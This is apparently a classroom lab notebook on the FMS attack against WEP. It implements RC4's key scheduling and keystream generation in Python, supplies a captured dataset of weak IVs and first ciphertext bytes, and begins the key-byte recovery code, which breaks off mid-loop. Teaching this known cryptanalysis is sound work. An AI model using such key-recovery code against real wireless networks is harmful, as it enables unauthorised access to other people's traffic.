# FMS Attack Learning Notebook

## 1.0 Explaining RC4 with Prepended IV
Stream ciphers calculate `ciphertext = plaintext ^ keystream`. The keystream is generated to the same length of the plaintext, and derived from the secret key. In this notebook, we denote the keystream as `KS` and the secret key as `K`. If two parties are continuously communicating using RC4, different keystreams need to be generated for each message. If distinct keystreams are not used, an adversary with one plaintext and ciphertext pair `(P_0, C_0)` can decrypt any other message. The adversary only has to compute `KS = P_0 ^ C_0` and then for any future ciphertext, `P_n = C_n ^ KS`. 

To mitigate this issue, a distinct Initialization Vector (IV) is used for each message. The parties each generate a pseudorandom 3-byte IV, and prepend it to `K` before the keystream is generated. The IV, along with the ciphertext, is transmitted unencrypted to the receiving party, so the recepient can generate the same keystream and decrypt the message. The IV can be kept as plaintext because, without `K`, the keystream cannot be generated. At least that's what the intent was, but WEP was totally broken under this construct, as this lab will demonstrate.  

Run each python cell, and observe the output as RC4 mixes its internal state, generates a keystream, encrypts, and decrypts.

## 1.1 Key Scheduling Algorithm (KSA)
The KSA is responsible for mixing, shuffling, and permuting the internal state array `S` of RC4. `S` needs to be permuted based on `K` before being passed to the keystream generation algorithm. Pseudocode for the KSA is given below.

```
for i from 0 to 255:
    S[i] = i
end for

j := 0
for i from 0 to 255:
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap(S[i], S[j])
end for
```

In [ ]:
import random

# initialize S to the identity permutation
def initialize_s():
    S = list(range(256))
    print(f"[*] S before KSA: {S}\n")
    
    return S

# swap two values by index in S
def swap_by_index(S, i, j):
    temp = S[i]
    S[i] = S[j]
    S[j] = temp

# key scheduling algorithm - KSA
def ksa(iv, key):
    S = initialize_s()
    j = 0
    session_key = iv + key
    print(f"[*] Session key: {session_key}\n")
    # mixing
    for i in range(256):
        j = (j + S[i] + session_key[i % len(session_key)]) % 256
        swap_by_index(S, i, j)

    print(f"[*] S after KSA:{S}\n")
    return S


# driver code
iv = [random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)]
print(f"[*] Using IV: {iv}\n")
key = [10, 23, 75, 1, 78, 43, 22, 7, 99]
S = ksa(iv, key)

## 1.2 Pseudorandom Number Generation Algorithm (PRGA)
The PRGA is responsible for generating the keystream, based on `K` and `S`. The number of keystream bytes generated is the same as the length of the plaintext. As we will see in the FMS attack, the PRGA is invertible, allowing an attacker to exploit the PRGA to calculate `K`. Pseudocode for the PRGA is given below.

```
i := 0
j := 0

while GeneratingOutput:
    i := (i+1) mod 256
    j := (j + S[i]) mod 256
    swap(S[i], S[j])
    t := (S[i] + S[j]) mod 256
    output S[t]
end while
```

In [ ]:
# pseudorandom generation algorithm - PRGA
def prga(S, length):
    i = 0
    j = 0
    keystream = []
    for _ in range(length):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        swap_by_index(S, i, j)
        t = (S[i] + S[j]) % 256
        keystream.append(S[t])

    return keystream

# driver code
plaintext = [ord(b) for b in "FMS LAB PLAINTEXT"]
keystream = prga(S, len(plaintext))

print(f"[*] Using plaintext: {plaintext}")
print(f"[*] Generated keystream: {keystream}\n")

## 1.3 Encryption and Decryption
Encryption and decryption are simple operations once the keystream has been generated. The use of the distinct IVs for different messages in a session gurantees different keystreams. The below code completes the generic RC4 with a preprended IV demonstration.

In [ ]:
# encryption
ciphertext = [x ^ y for x, y in zip(keystream, plaintext)]
print(f"[*] Ciphertext calculated: {ciphertext}\n")

decrypted = [x ^ y for x, y in zip(keystream, ciphertext)]
print(f"[*] Decrypted ciphertext: {decrypted}")
print(f"[*] Formatted plaintext: {''.join(chr(b) for b in decrypted)}")

## 2.0 Offline Calculation of K[0]
The section below walks through an example, with verbose output, of recovering 1 byte of the secret key. The data collection has been done already, and a sample dataset is provided. The goal for section 1 is to provide an understanding of the attack flow and equations needed to calculate K[0]. 

Notice the dataset contains 4 byte entries. The first 3 bytes are a weak IV of the form `[A+3, N-1, X]` and the 4th byte is the first byte of the ciphertext. Since we know the first plaintext byte is `0xAA` from the SNAP header, we know `CT[0] = 0xAA ^ KS[0]` where `KS[0]` is the first byte of the keystream.

In [ ]:
# sample data collected from live lab attack, entries are of form [IV_0, IV_1, IV_2, CT_0]
data = [[3, 255, 0, 5], [3, 255, 1, 145], [3, 255, 2, 180], [3, 255, 3, 30], [3, 255, 4, 136], [3, 255, 5, 63], [3, 255, 6, 15], [3, 255, 7, 12], [3, 255, 8, 19], [3, 255, 9, 16], [3, 255, 10, 38], [3, 255, 11, 117], [3, 255, 12, 169], [3, 255, 13, 163], [3, 255, 14, 200], [3, 255, 15, 55], [3, 255, 16, 46], [3, 255, 17, 169], [3, 255, 18, 138], [3, 255, 19, 96], [3, 255, 20, 10], [3, 255, 21, 174], [3, 255, 22, 23], [3, 255, 23, 98], [3, 255, 24, 10], [3, 255, 25, 29], [3, 255, 26, 203], [3, 255, 27, 222], [3, 255, 28, 30], [3, 255, 29, 192], [3, 255, 30, 229], [3, 255, 31, 122], [3, 255, 32, 39], [3, 255, 33, 184], [3, 255, 34, 196], [3, 255, 35, 224], [3, 255, 36, 105], [3, 255, 37, 250], [3, 255, 38, 148], [3, 255, 39, 132], [3, 255, 40, 3], [3, 255, 41, 8], [3, 255, 42, 154], [3, 255, 43, 250], [3, 255, 44, 197], [3, 255, 45, 28], [3, 255, 46, 68], [3, 255, 47, 76], [3, 255, 48, 252], [3, 255, 49, 81], [3, 255, 50, 220], [3, 255, 51, 169], [3, 255, 52, 34], [3, 255, 53, 45], [3, 255, 54, 127], [3, 255, 55, 122], [3, 255, 56, 21], [3, 255, 57, 241], [3, 255, 58, 175], [3, 255, 59, 57], [3, 255, 60, 169], [3, 255, 61, 227], [3, 255, 62, 135], [3, 255, 63, 79], [3, 255, 64, 187], [3, 255, 65, 221], [3, 255, 66, 235], [3, 255, 67, 225], [3, 255, 68, 130], [3, 255, 69, 33], [3, 255, 70, 103], [3, 255, 71, 234], [3, 255, 72, 169], [3, 255, 73, 23], [3, 255, 74, 205], [3, 255, 75, 73], [3, 255, 76, 6], [3, 255, 77, 159], [3, 255, 78, 85], [3, 255, 79, 186], [3, 255, 80, 144], [3, 255, 81, 19], [3, 255, 82, 21], [3, 255, 83, 160], [3, 255, 84, 49], [3, 255, 85, 85], [3, 255, 86, 92], [3, 255, 87, 197], [3, 255, 88, 246], [3, 255, 89, 41], [3, 255, 90, 44], [3, 255, 91, 9], [3, 255, 92, 113], [3, 255, 93, 92], [3, 255, 94, 111], [3, 255, 95, 222], [3, 255, 96, 227], [3, 255, 97, 162], [3, 255, 98, 157], [3, 255, 99, 169], [3, 255, 100, 195], [3, 255, 101, 144], [3, 255, 102, 2], [3, 255, 103, 147], [3, 255, 104, 107], [3, 255, 105, 53], [3, 255, 106, 41], [3, 255, 107, 107], [3, 255, 108, 167], [3, 255, 109, 115], [3, 255, 110, 236], [3, 255, 111, 254], [3, 255, 112, 38], [3, 255, 113, 139], [3, 255, 114, 151], [3, 255, 115, 129], [3, 255, 116, 50], [3, 255, 117, 220], [3, 255, 118, 15], [3, 255, 119, 102], [3, 255, 120, 197], [3, 255, 121, 251], [3, 255, 122, 234], [3, 255, 123, 14], [3, 255, 124, 214], [3, 255, 125, 8], [3, 255, 126, 174], [3, 255, 127, 84], [3, 255, 128, 155], [3, 255, 129, 179], [3, 255, 130, 169], [3, 255, 131, 164], [3, 255, 132, 68], [3, 255, 133, 191], [3, 255, 134, 241], [3, 255, 135, 233], [3, 255, 136, 186], [3, 255, 137, 129], [3, 255, 138, 142], [3, 255, 139, 250], [3, 255, 140, 157], [3, 255, 141, 203], [3, 255, 142, 188], [3, 255, 143, 85], [3, 255, 144, 134], [3, 255, 145, 196], [3, 255, 146, 10], [3, 255, 147, 200], [3, 255, 148, 30], [3, 255, 149, 97], [3, 255, 150, 189], [3, 255, 151, 127], [3, 255, 152, 59], [3, 255, 153, 169], [3, 255, 154, 214], [3, 255, 155, 249], [3, 255, 156, 232], [3, 255, 157, 227], [3, 255, 158, 193], [3, 255, 159, 124], [3, 255, 160, 142], [3, 255, 161, 123], [3, 255, 162, 114], [3, 255, 163, 253], [3, 255, 164, 169], [3, 255, 165, 96], [3, 255, 166, 102], [3, 255, 167, 90], [3, 255, 168, 169], [3, 255, 169, 127], [3, 255, 170, 241], [3, 255, 171, 163], [3, 255, 172, 146], [3, 255, 173, 102], [3, 255, 174, 83], [3, 255, 175, 213], [3, 255, 176, 169], [3, 255, 177, 98], [3, 255, 178, 132], [3, 255, 179, 126], [3, 255, 180, 203], [3, 255, 181, 169], [3, 255, 182, 62], [3, 255, 183, 80], [3, 255, 184, 103], [3, 255, 185, 69], [3, 255, 186, 209], [3, 255, 187, 198], [3, 255, 188, 29], [3, 255, 189, 172], [3, 255, 190, 199], [3, 255, 191, 60], [3, 255, 192, 252], [3, 255, 193, 251], [3, 255, 194, 14], [3, 255, 195, 132], [3, 255, 196, 12], [3, 255, 197, 182], [3, 255, 198, 177], [3, 255, 199, 76], [3, 255, 200, 37], [3, 255, 201, 71], [3, 255, 202, 87], [3, 255, 203, 139], [3, 255, 204, 152], [3, 255, 205, 201], [3, 255, 206, 213], [3, 255, 207, 180], [3, 255, 208, 191], [3, 255, 209, 184], [3, 255, 210, 26], [3, 255, 211, 152], [3, 255, 212, 190], [3, 255, 213, 113], [3, 255, 214, 45], [3, 255, 215, 200], [3, 255, 216, 32], [3, 255, 217, 231], [3, 255, 218, 102], [3, 255, 219, 225], [3, 255, 220, 35], [3, 255, 221, 248], [3, 255, 222, 158], [3, 255, 223, 2], [3, 255, 224, 59], [3, 255, 225, 164], [3, 255, 226, 118], [3, 255, 227, 112], [3, 255, 228, 148], [3, 255, 229, 126], [3, 255, 230, 155], [3, 255, 231, 95], [3, 255, 232, 229], [3, 255, 233, 31], [3, 255, 234, 146], [3, 255, 235, 169], [3, 255, 236, 188], [3, 255, 237, 207], [3, 255, 238, 1], [3, 255, 239, 189], [3, 255, 240, 140], [3, 255, 241, 183], [3, 255, 242, 167], [3, 255, 243, 90], [3, 255, 244, 251], [3, 255, 245, 106], [3, 255, 246, 13], [3, 255, 247, 18], [3, 255, 248, 159], [3, 255, 249, 35], [3, 255, 250, 185], [3, 255, 251, 25], [3, 255, 252, 108], [3, 255, 253, 196], [3, 255, 254, 93], [3, 255, 255, 23], [4, 255, 0, 72], [4, 255, 1, 227], [4, 255, 2, 53], [4, 255, 3, 224], [4, 255, 4, 63], [4, 255, 5, 82], [4, 255, 6, 211], [4, 255, 7, 35], [4, 255, 8, 175], [4, 255, 9, 165], [4, 255, 10, 174], [4, 255, 11, 224], [4, 255, 12, 111], [4, 255, 13, 37], [4, 255, 14, 53], [4, 255, 15, 249], [4, 255, 16, 174], [4, 255, 17, 89], [4, 255, 18, 114], [4, 255, 19, 70], [4, 255, 20, 60], [4, 255, 21, 96], [4, 255, 22, 83], [4, 255, 23, 6], [4, 255, 24, 79], [4, 255, 25, 205], [4, 255, 26, 129], [4, 255, 27, 56], [4, 255, 28, 198], [4, 255, 29, 137], [4, 255, 30, 174], [4, 255, 31, 225], [4, 255, 32, 238], [4, 255, 33, 249], [4, 255, 34, 136], [4, 255, 35, 192], [4, 255, 36, 29], [4, 255, 37, 71], [4, 255, 38, 2], [4, 255, 39, 35], [4, 255, 40, 167], [4, 255, 41, 229], [4, 255, 42, 163], [4, 255, 43, 30], [4, 255, 44, 210], [4, 255, 45, 120], [4, 255, 46, 64], [4, 255, 47, 252], [4, 255, 48, 10], [4, 255, 49, 11], [4, 255, 50, 98], [4, 255, 51, 174], [4, 255, 52, 139], [4, 255, 53, 24], [4, 255, 54, 32], [4, 255, 55, 148], [4, 255, 56, 16], [4, 255, 57, 252], [4, 255, 58, 198], [4, 255, 59, 121], [4, 255, 60, 141], [4, 255, 61, 99], [4, 255, 62, 148], [4, 255, 63, 174], [4, 255, 64, 177], [4, 255, 65, 34], [4, 255, 66, 110], [4, 255, 67, 253], [4, 255, 68, 4], [4, 255, 69, 85], [4, 255, 70, 206], [4, 255, 71, 208], [4, 255, 72, 201], [4, 255, 73, 98], [4, 255, 74, 174], [4, 255, 75, 247], [4, 255, 76, 197], [4, 255, 77, 205], [4, 255, 78, 239], [4, 255, 79, 93], [4, 255, 80, 133], [4, 255, 81, 71], [4, 255, 82, 137], [4, 255, 83, 125], [4, 255, 84, 65], [4, 255, 85, 232], [4, 255, 86, 87], [4, 255, 87, 227], [4, 255, 88, 206], [4, 255, 89, 43], [4, 255, 90, 6], [4, 255, 91, 246], [4, 255, 92, 116], [4, 255, 93, 105], [4, 255, 94, 65], [4, 255, 95, 5], [4, 255, 96, 92], [4, 255, 97, 250], [4, 255, 98, 193], [4, 255, 99, 17], [4, 255, 100, 205], [4, 255, 101, 44], [4, 255, 102, 102], [4, 255, 103, 217], [4, 255, 104, 14], [4, 255, 105, 49], [4, 255, 106, 24], [4, 255, 107, 210], [4, 255, 108, 242], [4, 255, 109, 0], [4, 255, 110, 115], [4, 255, 111, 228], [4, 255, 112, 16], [4, 255, 113, 191], [4, 255, 114, 178], [4, 255, 115, 251], [4, 255, 116, 27], [4, 255, 117, 168], [4, 255, 118, 246], [4, 255, 119, 93], [4, 255, 120, 133], [4, 255, 121, 190], [4, 255, 122, 105], [4, 255, 123, 74], [4, 255, 124, 63], [4, 255, 125, 146], [4, 255, 126, 171], [4, 255, 127, 47], [4, 255, 128, 172], [4, 255, 129, 72], [4, 255, 130, 176], [4, 255, 131, 78], [4, 255, 132, 218], [4, 255, 133, 80], [4, 255, 134, 248], [4, 255, 135, 135], [4, 255, 136, 89], [4, 255, 137, 17], [4, 255, 138, 166], [4, 255, 139, 182], [4, 255, 140, 32], [4, 255, 141, 91], [4, 255, 142, 140], [4, 255, 143, 134], [4, 255, 144, 191], [4, 255, 145, 185], [4, 255, 146, 254], [4, 255, 147, 28], [4, 255, 148, 184], [4, 255, 149, 212], [4, 255, 150, 25], [4, 255, 151, 240], [4, 255, 152, 116], [4, 255, 153, 112], [4, 255, 154, 124], [4, 255, 155, 76], [4, 255, 156, 247], [4, 255, 157, 89], [4, 255, 158, 231], [4, 255, 159, 194], [4, 255, 160, 136], [4, 255, 161, 178], [4, 255, 162, 114], [4, 255, 163, 219], [4, 255, 164, 24], [4, 255, 165, 189], [4, 255, 166, 94], [4, 255, 167, 185], [4, 255, 168, 70], [4, 255, 169, 141], [4, 255, 170, 250], [4, 255, 171, 93], [4, 255, 172, 81], [4, 255, 173, 154], [4, 255, 174, 192], [4, 255, 175, 88], [4, 255, 176, 234], [4, 255, 177, 165], [4, 255, 178, 225], [4, 255, 179, 222], [4, 255, 180, 25], [4, 255, 181, 179], [4, 255, 182, 183], [4, 255, 183, 59], [4, 255, 184, 57], [4, 255, 185, 89], [4, 255, 186, 167], [4, 255, 187, 25], [4, 255, 188, 212], [4, 255, 189, 222], [4, 255, 190, 62], [4, 255, 191, 201], [4, 255, 192, 99], [4, 255, 193, 174], [4, 255, 194, 83], [4, 255, 195, 239], [4, 255, 196, 96], [4, 255, 197, 255], [4, 255, 198, 236], [4, 255, 199, 12], [4, 255, 200, 233], [4, 255, 201, 14], [4, 255, 202, 52], [4, 255, 203, 210], [4, 255, 204, 226], [4, 255, 205, 200], [4, 255, 206, 169], [4, 255, 207, 232], [4, 255, 208, 160], [4, 255, 209, 118], [4, 255, 210, 141], [4, 255, 211, 151], [4, 255, 212, 109], [4, 255, 213, 121], [4, 255, 214, 198], [4, 255, 215, 225], [4, 255, 216, 188], [4, 255, 217, 134], [4, 255, 218, 239], [4, 255, 219, 83], [4, 255, 220, 207], [4, 255, 221, 53], [4, 255, 222, 254], [4, 255, 223, 174], [4, 255, 224, 98], [4, 255, 225, 72], [4, 255, 226, 70], [4, 255, 227, 207], [4, 255, 228, 174], [4, 255, 229, 205], [4, 255, 230, 86], [4, 255, 231, 208], [4, 255, 232, 138], [4, 255, 233, 152], [4, 255, 234, 200], [4, 255, 235, 71], [4, 255, 236, 213], [4, 255, 237, 235], [4, 255, 238, 133], [4, 255, 239, 27], [4, 255, 240, 209], [4, 255, 241, 61], [4, 255, 242, 18], [4, 255, 243, 139], [4, 255, 244, 47], [4, 255, 245, 254], [4, 255, 246, 200], [4, 255, 247, 221], [4, 255, 248, 253], [4, 255, 249, 196], [4, 255, 250, 187], [4, 255, 251, 168], [4, 255, 252, 214], [4, 255, 253, 148], [4, 255, 254, 83], [4, 255, 255, 55], [5, 255, 0, 9], [5, 255, 1, 144], [5, 255, 2, 244], [5, 255, 3, 98], [5, 255, 4, 54], [5, 255, 5, 145], [5, 255, 6, 175], [5, 255, 7, 240], [5, 255, 8, 175], [5, 255, 9, 1], [5, 255, 10, 175], [5, 255, 11, 167], [5, 255, 12, 24], [5, 255, 13, 14], [5, 255, 14, 171], [5, 255, 15, 234], [5, 255, 16, 1], [5, 255, 17, 53], [5, 255, 18, 47], [5, 255, 19, 10], [5, 255, 20, 226], [5, 255, 21, 215], [5, 255, 22, 212], [5, 255, 23, 254], [5, 255, 24, 6], [5, 255, 25, 128], [5, 255, 26, 230], [5, 255, 27, 29], [5, 255, 28, 113], [5, 255, 29, 245], [5, 255, 30, 56], [5, 255, 31, 64], [5, 255, 32, 84], [5, 255, 33, 220], [5, 255, 34, 29], [5, 255, 35, 235], [5, 255, 36, 155], [5, 255, 37, 12], [5, 255, 38, 174], [5, 255, 39, 175], [5, 255, 40, 133], [5, 255, 41, 168], [5, 255, 42, 12], [5, 255, 43, 89], [5, 255, 44, 253], [5, 255, 45, 142], [5, 255, 46, 26], [5, 255, 47, 104], [5, 255, 48, 14], [5, 255, 49, 250], [5, 255, 50, 171], [5, 255, 51, 223], [5, 255, 52, 157], [5, 255, 53, 85], [5, 255, 54, 44], [5, 255, 55, 246], [5, 255, 56, 168], [5, 255, 57, 102], [5, 255, 58, 168], [5, 255, 59, 30], [5, 255, 60, 221], [5, 255, 61, 214], [5, 255, 62, 40], [5, 255, 63, 205], [5, 255, 64, 10], [5, 255, 65, 46], [5, 255, 66, 92], [5, 255, 67, 105], [5, 255, 68, 238], [5, 255, 69, 11], [5, 255, 70, 94], [5, 255, 71, 128], [5, 255, 72, 36], [5, 255, 73, 116], [5, 255, 74, 161], [5, 255, 75, 29], [5, 255, 76, 180], [5, 255, 77, 128], [5, 255, 78, 253], [5, 255, 79, 175], [5, 255, 80, 91], [5, 255, 81, 170], [5, 255, 82, 0], [5, 255, 83, 25], [5, 255, 84, 158], [5, 255, 85, 81], [5, 255, 86, 92], [5, 255, 87, 196], [5, 255, 88, 106], [5, 255, 89, 107], [5, 255, 90, 139], [5, 255, 91, 167], [5, 255, 92, 162], [5, 255, 93, 31], [5, 255, 94, 255], [5, 255, 95, 166], [5, 255, 96, 247], [5, 255, 97, 96], [5, 255, 98, 146], [5, 255, 99, 11], [5, 255, 100, 28], [5, 255, 101, 103], [5, 255, 102, 241], [5, 255, 103, 175], [5, 255, 104, 164], [5, 255, 105, 252], [5, 255, 106, 61], [5, 255, 107, 217], [5, 255, 108, 36], [5, 255, 109, 178], [5, 255, 110, 10], [5, 255, 111, 40], [5, 255, 112, 159], [5, 255, 113, 142], [5, 255, 114, 225], [5, 255, 115, 64], [5, 255, 116, 175], [5, 255, 117, 104], [5, 255, 118, 15], [5, 255, 119, 245], [5, 255, 120, 227], [5, 255, 121, 14], [5, 255, 122, 41], [5, 255, 123, 133], [5, 255, 124, 166], [5, 255, 125, 194], [5, 255, 126, 76], [5, 255, 127, 147], [5, 255, 128, 166], [5, 255, 129, 175], [5, 255, 130, 13], [5, 255, 131, 102], [5, 255, 132, 25], [5, 255, 133, 25], [5, 255, 134, 49], [5, 255, 135, 143], [5, 255, 136, 17], [5, 255, 137, 170], [5, 255, 138, 6], [5, 255, 139, 183], [5, 255, 140, 89], [5, 255, 141, 102], [5, 255, 142, 102], [5, 255, 143, 147], [5, 255, 144, 11], [5, 255, 145, 7], [5, 255, 146, 239], [5, 255, 147, 57], [5, 255, 148, 210], [5, 255, 149, 116], [5, 255, 150, 250], [5, 255, 151, 245], [5, 255, 152, 81], [5, 255, 153, 7], [5, 255, 154, 99], [5, 255, 155, 175], [5, 255, 156, 3], [5, 255, 157, 102], [5, 255, 158, 129], [5, 255, 159, 58], [5, 255, 160, 204], [5, 255, 161, 70], [5, 255, 162, 228], [5, 255, 163, 207], [5, 255, 164, 112], [5, 255, 165, 69], [5, 255, 166, 148], [5, 255, 167, 47], [5, 255, 168, 102], [5, 255, 169, 90], [5, 255, 170, 163], [5, 255, 171, 169], [5, 255, 172, 163], [5, 255, 173, 194], [5, 255, 174, 188], [5, 255, 175, 13], [5, 255, 176, 93], [5, 255, 177, 19], [5, 255, 178, 28], [5, 255, 179, 217], [5, 255, 180, 154], [5, 255, 181, 100], [5, 255, 182, 140], [5, 255, 183, 92], [5, 255, 184, 62], [5, 255, 185, 229], [5, 255, 186, 255], [5, 255, 187, 137], [5, 255, 188, 72], [5, 255, 189, 252], [5, 255, 190, 58], [5, 255, 191, 101], [5, 255, 192, 167], [5, 255, 193, 175], [5, 255, 194, 175], [5, 255, 195, 22], [5, 255, 196, 45], [5, 255, 197, 11], [5, 255, 198, 150], [5, 255, 199, 10], [5, 255, 200, 167], [5, 255, 201, 201], [5, 255, 202, 60], [5, 255, 203, 62], [5, 255, 204, 92], [5, 255, 205, 211], [5, 255, 206, 47], [5, 255, 207, 175], [5, 255, 208, 86], [5, 255, 209, 101], [5, 255, 210, 144], [5, 255, 211, 126], [5, 255, 212, 216], [5, 255, 213, 183], [5, 255, 214, 135], [5, 255, 215, 41], [5, 255, 216, 207], [5, 255, 217, 147], [5, 255, 218, 2], [5, 255, 219, 59], [5, 255, 220, 223], [5, 255, 221, 175], [5, 255, 222, 172], [5, 255, 223, 175], [5, 255, 224, 23], [5, 255, 225, 135], [5, 255, 226, 164], [5, 255, 227, 11], [5, 255, 228, 203], [5, 255, 229, 231], [5, 255, 230, 138], [5, 255, 231, 30], [5, 255, 232, 207], [5, 255, 233, 23], [5, 255, 234, 155], [5, 255, 235, 187], [5, 255, 236, 54], [5, 255, 237, 182], [5, 255, 238, 113], [5, 255, 239, 67], [5, 255, 240, 116], [5, 255, 241, 175], [5, 255, 242, 128], [5, 255, 243, 241], [5, 255, 244, 156], [5, 255, 245, 247], [5, 255, 246, 42], [5, 255, 247, 124], [5, 255, 248, 85], [5, 255, 249, 227], [5, 255, 250, 168], [5, 255, 251, 113], [5, 255, 252, 100], [5, 255, 253, 99], [5, 255, 254, 125], [5, 255, 255, 252], [6, 255, 0, 59], [6, 255, 1, 213], [6, 255, 2, 63], [6, 255, 3, 69], [6, 255, 4, 179], [6, 255, 5, 137], [6, 255, 6, 0], [6, 255, 7, 148], [6, 255, 8, 53], [6, 255, 9, 115], [6, 255, 10, 157], [6, 255, 11, 33], [6, 255, 12, 68], [6, 255, 13, 92], [6, 255, 14, 138], [6, 255, 15, 203], [6, 255, 16, 94], [6, 255, 17, 82], [6, 255, 18, 105], [6, 255, 19, 53], [6, 255, 20, 24], [6, 255, 21, 217], [6, 255, 22, 191], [6, 255, 23, 253], [6, 255, 24, 3], [6, 255, 25, 65], [6, 255, 26, 90], [6, 255, 27, 197], [6, 255, 28, 7], [6, 255, 29, 232], [6, 255, 30, 100], [6, 255, 31, 67], [6, 255, 32, 81], [6, 255, 33, 143], [6, 255, 34, 44], [6, 255, 35, 68], [6, 255, 36, 118], [6, 255, 37, 162], [6, 255, 38, 207], [6, 255, 39, 124], [6, 255, 40, 240], [6, 255, 41, 193], [6, 255, 42, 17], [6, 255, 43, 13], [6, 255, 44, 197], [6, 255, 45, 17], [6, 255, 46, 142], [6, 255, 47, 188], [6, 255, 48, 116], [6, 255, 49, 102], [6, 255, 50, 105], [6, 255, 51, 195], [6, 255, 52, 128], [6, 255, 53, 101], [6, 255, 54, 28], [6, 255, 55, 153], [6, 255, 56, 134], [6, 255, 57, 9], [6, 255, 58, 80], [6, 255, 59, 190], [6, 255, 60, 255], [6, 255, 61, 237], [6, 255, 62, 149], [6, 255, 63, 159], [6, 255, 64, 167], [6, 255, 65, 95], [6, 255, 66, 210], [6, 255, 67, 165], [6, 255, 68, 115], [6, 255, 69, 12], [6, 255, 70, 250], [6, 255, 71, 144], [6, 255, 72, 74], [6, 255, 73, 75], [6, 255, 74, 164], [6, 255, 75, 169], [6, 255, 76, 140], [6, 255, 77, 11], [6, 255, 78, 28], [6, 255, 79, 251], [6, 255, 80, 126], [6, 255, 81, 21], [6, 255, 82, 45], [6, 255, 83, 207], [6, 255, 84, 90], [6, 255, 85, 117], [6, 255, 86, 172], [6, 255, 87, 45], [6, 255, 88, 29], [6, 255, 89, 201], [6, 255, 90, 65], [6, 255, 91, 245], [6, 255, 92, 162], [6, 255, 93, 109], [6, 255, 94, 134], [6, 255, 95, 190], [6, 255, 96, 214], [6, 255, 97, 10], [6, 255, 98, 8], [6, 255, 99, 211], [6, 255, 100, 105], [6, 255, 101, 148], [6, 255, 102, 255], [6, 255, 103, 123], [6, 255, 104, 117], [6, 255, 105, 154], [6, 255, 106, 178], [6, 255, 107, 21], [6, 255, 108, 57], [6, 255, 109, 145], [6, 255, 110, 237], [6, 255, 111, 66], [6, 255, 112, 227], [6, 255, 113, 88], [6, 255, 114, 221], [6, 255, 115, 128], [6, 255, 116, 122], [6, 255, 117, 27], [6, 255, 118, 127], [6, 255, 119, 61], [6, 255, 120, 172], [6, 255, 121, 105], [6, 255, 122, 174], [6, 255, 123, 147], [6, 255, 124, 64], [6, 255, 125, 40], [6, 255, 126, 164], [6, 255, 127, 54], [6, 255, 128, 222], [6, 255, 129, 172], [6, 255, 130, 216], [6, 255, 131, 190], [6, 255, 132, 130], [6, 255, 133, 233], [6, 255, 134, 45], [6, 255, 135, 172], [6, 255, 136, 24], [6, 255, 137, 139], [6, 255, 138, 145], [6, 255, 139, 182], [6, 255, 140, 202], [6, 255, 141, 154], [6, 255, 142, 145], [6, 255, 143, 138], [6, 255, 144, 242], [6, 255, 145, 228], [6, 255, 146, 190], [6, 255, 147, 183], [6, 255, 148, 175], [6, 255, 149, 29], [6, 255, 150, 191], [6, 255, 151, 225], [6, 255, 152, 112], [6, 255, 153, 65], [6, 255, 154, 181], [6, 255, 155, 225], [6, 255, 156, 44], [6, 255, 157, 112], [6, 255, 158, 216], [6, 255, 159, 3], [6, 255, 160, 111], [6, 255, 161, 16], [6, 255, 162, 201], [6, 255, 163, 145], [6, 255, 164, 85], [6, 255, 165, 180], [6, 255, 166, 253], [6, 255, 167, 67], [6, 255, 168, 246], [6, 255, 169, 161], [6, 255, 170, 65], [6, 255, 171, 10], [6, 255, 172, 199], [6, 255, 173, 255], [6, 255, 174, 192], [6, 255, 175, 116], [6, 255, 176, 61], [6, 255, 177, 150], [6, 255, 178, 210], [6, 255, 179, 179], [6, 255, 180, 99], [6, 255, 181, 189], [6, 255, 182, 237], [6, 255, 183, 88], [6, 255, 184, 13], [6, 255, 185, 177], [6, 255, 186, 225], [6, 255, 187, 106], [6, 255, 188, 53], [6, 255, 189, 228], [6, 255, 190, 27], [6, 255, 191, 250], [6, 255, 192, 48], [6, 255, 193, 225], [6, 255, 194, 30], [6, 255, 195, 17], [6, 255, 196, 198], [6, 255, 197, 95], [6, 255, 198, 234], [6, 255, 199, 64], [6, 255, 200, 216], [6, 255, 201, 165], [6, 255, 202, 235], [6, 255, 203, 188], [6, 255, 204, 128], [6, 255, 205, 182], [6, 255, 206, 125], [6, 255, 207, 51], [6, 255, 208, 110], [6, 255, 209, 20], [6, 255, 210, 111], [6, 255, 211, 221], [6, 255, 212, 142], [6, 255, 213, 171], [6, 255, 214, 172], [6, 255, 215, 44], [6, 255, 216, 44], [6, 255, 217, 129], [6, 255, 218, 155], [6, 255, 219, 240], [6, 255, 220, 203], [6, 255, 221, 7], [6, 255, 222, 81], [6, 255, 223, 177], [6, 255, 224, 219], [6, 255, 225, 74], [6, 255, 226, 197], [6, 255, 227, 4], [6, 255, 228, 110], [6, 255, 229, 55], [6, 255, 230, 73], [6, 255, 231, 155], [6, 255, 232, 64], [6, 255, 233, 102], [6, 255, 234, 106], [6, 255, 235, 142], [6, 255, 236, 115], [6, 255, 237, 181], [6, 255, 238, 105], [6, 255, 239, 172], [6, 255, 240, 198], [6, 255, 241, 139], [6, 255, 242, 163], [6, 255, 243, 116], [6, 255, 244, 239], [6, 255, 245, 146], [6, 255, 246, 85], [6, 255, 247, 242], [6, 255, 248, 90], [6, 255, 249, 85], [6, 255, 250, 240], [6, 255, 251, 217], [6, 255, 252, 177], [6, 255, 253, 174], [6, 255, 254, 61], [6, 255, 255, 182]]

### 2.1 Defining Helper Functions

In [ ]:
# this function simply swaps two values in S based on index
def swap_by_index(S, i, j):
    temp = S[i]
    S[i] = S[j]
    S[j] = temp
    
# this function executes the KSA up to A+3 iterations
def partial_ksa(session_key, A):
    S = list(range(256)) # initialize S to the identity permutation: [0, 1, 2, ..., 255]
    j = 0
    # init_0 and init_1 will store S[0] and S[1] after 1 KSA iteration for a future check
    init_0 = 0
    init_1 = 0 
    for i in range(A + 3):
        j = (j + S[i] + session_key[i]) % 256
        swap_by_index(S, i, j)
        # record S[0] and S[1] in the first iteration
        if i == 1:
            init_0 = S[0]
            init_1 = S[1]
            
    return S, j, init_0, init_1

### 2.2 FMS Attack Driver Code

In [ ]:
# A holds the index of the keybyte we want to recover, we demonstrate A = 0 step by step
A = 0
session_key = [0] * 3 # the session key is IV || KEY
prob_table = [0] * 256 # holds scores for all possible key bytes where the index is the byte value

# iterate over every datapoint gathered
for row in data:
    session_key[:3] = row[:3] # set first 3 bytes of the session key to the IV
    # partial execution of the KSA
    S, j, init_0, init_1 = partial_ksa(session_key, A)
    z = S[1] # note the current value of S[1] after partial KSA
    
    # check for the resolved condition: z + S[z] = A + 3
